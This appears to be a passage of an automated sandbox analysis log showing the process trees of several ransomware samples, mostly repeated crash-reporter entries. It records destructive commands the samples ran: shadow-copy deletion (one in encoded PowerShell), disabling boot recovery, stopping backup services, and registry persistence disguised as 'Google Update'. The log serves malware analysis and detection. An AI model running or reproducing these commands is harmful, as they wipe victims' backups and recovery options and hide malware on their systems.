      4⤵
      PID:9636
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1012
      4⤵
      PID:6488
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 992
      4⤵
      PID:8852
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 984
      4⤵
      PID:9440
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1004
      4⤵
      PID:2112
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1100
      4⤵
      PID:9720
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 960
      4⤵
      PID:1420
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1076
      4⤵
      PID:5428
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1168
      4⤵
      PID:10940
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 920
      4⤵
      PID:8708
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1056
      4⤵
      PID:8900
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1104
      4⤵
      PID:8852
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1132
      4⤵
      PID:6288
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1088
      4⤵
      PID:7968
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1220
      4⤵
      PID:10788
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1004
      4⤵
      PID:7272
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1112
      4⤵
      PID:10800
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1036
      4⤵
      PID:1480
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1240
      4⤵
      PID:10532
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1072
      4⤵
      PID:2120
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1020
      4⤵
      PID:5620
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1220
      4⤵
      PID:8328
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1204
      4⤵
      PID:964
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1000
      4⤵
      PID:7160
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 972
      4⤵
      PID:7756
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 764
      4⤵
      PID:8388
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 924
      4⤵
      PID:10832
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 968
      4⤵
      PID:5436
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1144
      4⤵
      PID:7372
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1048
      4⤵
      PID:5088
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1064
      4⤵
      PID:9540
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1052
      4⤵
      PID:10672
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 972
      4⤵
      PID:10428
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 764
      4⤵
      PID:9680
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1000
      4⤵
      PID:7368
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1072
      4⤵
      PID:6520
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 880
      4⤵
      PID:8412
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1132
      4⤵
      PID:7888
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 892
      4⤵
      PID:6644
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 896
      4⤵
      PID:8432
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 944
      4⤵
      PID:8188
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:8220
    - - C:\Windows\system32\mode.com
        
        mode con cp select=1251
        5⤵
        
        PID:10980
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:10208
- - C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
    Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
    3⤵
    - Executes dropped EXE
    - Drops desktop.ini file(s)
    - Enumerates connected drives
    - Drops autorun.inf file
    - Sets desktop wallpaper using registry
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2188
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3564
- - C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Sodin.alx-3fc734a086c8d3aba757aa147a8d46a317e47bb0372f1fb2abf0a163a5d2938b.exe
    Trojan-Ransom.Win32.Sodin.alx-3fc734a086c8d3aba757aa147a8d46a317e47bb0372f1fb2abf0a163a5d2938b.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5072
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5072 -s 236
      4⤵
      Program crash
      PID:1692
- - C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Sodin.bi-4871bea79e651791fb79ef0bc46f61e728c41d27e7f5b8877d0958a8672f26ea.exe
    Trojan-Ransom.Win32.Sodin.bi-4871bea79e651791fb79ef0bc46f61e728c41d27e7f5b8877d0958a8672f26ea.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4536
- - C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe
    Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Enumerates connected drives
    - Sets desktop wallpaper using registry
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    PID:2304
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      System Location Discovery: System Language Discovery
      PID:6036
- - C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exe
    Trojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:2864
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Users\Admin\AppData\Local\7c663e5a-c668-44b3-88ed-139e79eff5db" /deny *S-1-1-0:(OI)(CI)(DE,DC)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:5856
  - - C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exe
      "C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5540
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 1820
      4⤵
      Program crash
      PID:5380
- - C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exe
    Trojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    PID:1396
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 860
      4⤵
      Program crash
      PID:280
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 868
      4⤵
      Program crash
      PID:5772
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 912
      4⤵
      Program crash
      PID:5940
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 920
      4⤵
      Program crash
      PID:6108
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1092
      4⤵
      Program crash
      PID:2404
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1116
      4⤵
      Program crash
      PID:1400
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1380
      4⤵
      Program crash
      PID:5808
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1612
      4⤵
      Program crash
      PID:6456
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1620
      4⤵
      Program crash
      PID:6984
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1676
      4⤵
      Program crash
      PID:7780
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1760
      4⤵
      Program crash
      PID:6456
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1732
      4⤵
      Program crash
      PID:9256
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1748
      4⤵
      Program crash
      PID:7940
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1652
      4⤵
      Program crash
      PID:11004
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1864
      4⤵
      Program crash
      PID:8928
  - - C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exe
      "C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:9200
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 904
        5⤵
        Program crash
        
        PID:9224
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 932
        5⤵
        Program crash
        
        PID:5776
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 940
        5⤵
        Program crash
        
        PID:7348
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 920
        5⤵
        Program crash
        
        PID:6924
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 1124
        5⤵
        Program crash
        
        PID:10336
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 1188
        5⤵
        Program crash
        
        PID:8356
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 1408
        5⤵
        Program crash
        
        PID:7260
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 1636
        5⤵
        Program crash
        
        PID:5940
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 1856
        5⤵
        Program crash
        
        PID:5600
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 1636
        5⤵
        Program crash
        
        PID:8008
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 1864
        5⤵
        Program crash
        
        PID:8128
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 1716
        5⤵
        
        PID:3076
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 1676
        5⤵
        
        PID:4564
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 1296
        5⤵
        
        PID:5128
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1880
      4⤵
      Program crash
      PID:5840
- - C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe
    Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    PID:4324
  - - C:\Windows\SysWOW64\cmd.exe
      /c mkdir C:\tmp
      4⤵
      System Location Discovery: System Language Discovery
      PID:1400
  - - C:\Windows\SysWOW64\cmd.exe
      /c copy svchost.exe C:\tmp
      4⤵
      System Location Discovery: System Language Discovery
      PID:292
  - - C:\Windows\SysWOW64\cmd.exe
      /c attrib +s +h "C:\tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5840
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\tmp"
        5⤵
        Sets file to hidden
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:5864
  - - C:\Windows\SysWOW64\cmd.exe
      /c copy svchost.exe %AppData%\Microsoft\Windows\Start Menu\Programs\Startup
      4⤵
      System Location Discovery: System Language Discovery
      PID:5204
  - - C:\Windows\SysWOW64\cmd.exe
      /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" /V "Google Update" /t REG_SZ /F /D "C:\tmp\svchost.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3616
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" /V "Google Update" /t REG_SZ /F /D "C:\tmp\svchost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5144
  - - C:\Windows\SysWOW64\cmd.exe
      /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" /V "Google Update" /t REG_SZ /F /D "C:\tmp\svchost.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1264
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" /V "Google Update" /t REG_SZ /F /D "C:\tmp\svchost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5248
  - - C:\Windows\SysWOW64\cmd.exe
      /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /V "Google Update" /t REG_SZ /F /D "C:\tmp\svchost.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5272
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /V "Google Update" /t REG_SZ /F /D "C:\tmp\svchost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5308
  - - C:\Windows\SysWOW64\cmd.exe
      /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /V "Google Update" /t REG_SZ /F /D "C:\tmp\svchost.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5608
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /V "Google Update" /t REG_SZ /F /D "C:\tmp\svchost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6940
  - - C:\Windows\SysWOW64\cmd.exe
      /c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /V "Google Update" /t REG_SZ /F /D "C:\tmp\svchost.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5264
  - - C:\Windows\SysWOW64\cmd.exe
      /c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /V "Google Update" /t REG_SZ /F /D "C:\tmp\svchost.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:9072
  - - C:\Windows\SysWOW64\cmd.exe
      /c start vssadmin delete shadows /all /quiet
      4⤵
      System Location Discovery: System Language Discovery
      PID:6268
  - - C:\Windows\SysWOW64\cmd.exe
      /c WMIC SERVICE WHERE "caption LIKE '%Cobian%'" CALL STOPSERVICE
      4⤵
      System Location Discovery: System Language Discovery
      PID:11236
  - - C:\Windows\SysWOW64\cmd.exe
      /c WMIC SERVICE WHERE "caption LIKE '%Acronis%'" CALL STOPSERVICE
      4⤵
      System Location Discovery: System Language Discovery
      PID:7676
  - - C:\Windows\SysWOW64\cmd.exe
      /c WMIC SERVICE WHERE "caption LIKE '%Veeam%'" CALL STOPSERVICE
      4⤵
      System Location Discovery: System Language Discovery
      PID:724
  - - C:\Windows\SysWOW64\cmd.exe
      /c WMIC SERVICE WHERE "caption LIKE '%Exchange%'" CALL STOPSERVICE
      4⤵
      System Location Discovery: System Language Discovery
      PID:6680
- - C:\Users\Admin\Desktop\00378\VHO-Trojan-Ransom.Win32.GandCrypt.gen-58803c76d2fe76fd10c75d7c8393a5b002f00c6d14f14b9a748ac3efc1bc830c.exe
    VHO-Trojan-Ransom.Win32.GandCrypt.gen-58803c76d2fe76fd10c75d7c8393a5b002f00c6d14f14b9a748ac3efc1bc830c.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    PID:2768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1408 -ip 1408
1⤵
PID:4404

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv
1⤵
PID:4556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4412 -ip 4412
1⤵
PID:4072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4412 -ip 4412
1⤵
PID:4060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4412 -ip 4412
1⤵
PID:1948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5072 -ip 5072
1⤵
PID:3664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4412 -ip 4412
1⤵
PID:3608

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4412 -ip 4412
1⤵
PID:1972

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4412 -ip 4412
1⤵
PID:1488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1396 -ip 1396
1⤵
PID:212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4412 -ip 4412
1⤵
PID:4784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4412 -ip 4412
1⤵
PID:5776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1396 -ip 1396
1⤵
PID:5276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4412 -ip 4412
1⤵
PID:5876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1396 -ip 1396
1⤵
PID:6136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4412 -ip 4412
1⤵
PID:5992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1396 -ip 1396
1⤵
PID:6048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4412 -ip 4412
1⤵
PID:1816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1396 -ip 1396
1⤵
PID:5080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4412 -ip 4412
1⤵
PID:5184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1396 -ip 1396
1⤵
PID:4384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4412 -ip 4412
1⤵
PID:964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1396 -ip 1396
1⤵
PID:5532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2864 -ip 2864
1⤵
PID:5400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4412 -ip 4412
1⤵
PID:4360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1396 -ip 1396
1⤵
PID:7484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4412 -ip 4412
1⤵
PID:5524

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\7w7o05f1-readme.txt
1⤵
PID:6944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1396 -ip 1396
1⤵
PID:6384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4412 -ip 4412
1⤵
PID:5128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
1⤵
PID:5216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4412 -ip 4412
1⤵
PID:9004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1396 -ip 1396
1⤵
PID:9336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4412 -ip 4412
1⤵
PID:10828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1396 -ip 1396
1⤵
PID:9460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1396 -ip 1396
1⤵
PID:10356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4412 -ip 4412
1⤵
PID:9500

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:8020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1396 -ip 1396
1⤵
PID:10668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4412 -ip 4412
1⤵
PID:8052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1396 -ip 1396
1⤵
PID:8708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4412 -ip 4412
1⤵
PID:8824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1396 -ip 1396
1⤵
PID:8076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4412 -ip 4412
1⤵
PID:2540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4412 -ip 4412
1⤵
PID:7308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1396 -ip 1396
1⤵
PID:10824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 9200 -ip 9200
1⤵
PID:7448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4412 -ip 4412
1⤵
PID:11056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 9200 -ip 9200
1⤵
PID:10924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4412 -ip 4412
1⤵
PID:9936

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\FILES ENCRYPTED.txt
1⤵
PID:8456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 9200 -ip 9200
1⤵
PID:6548

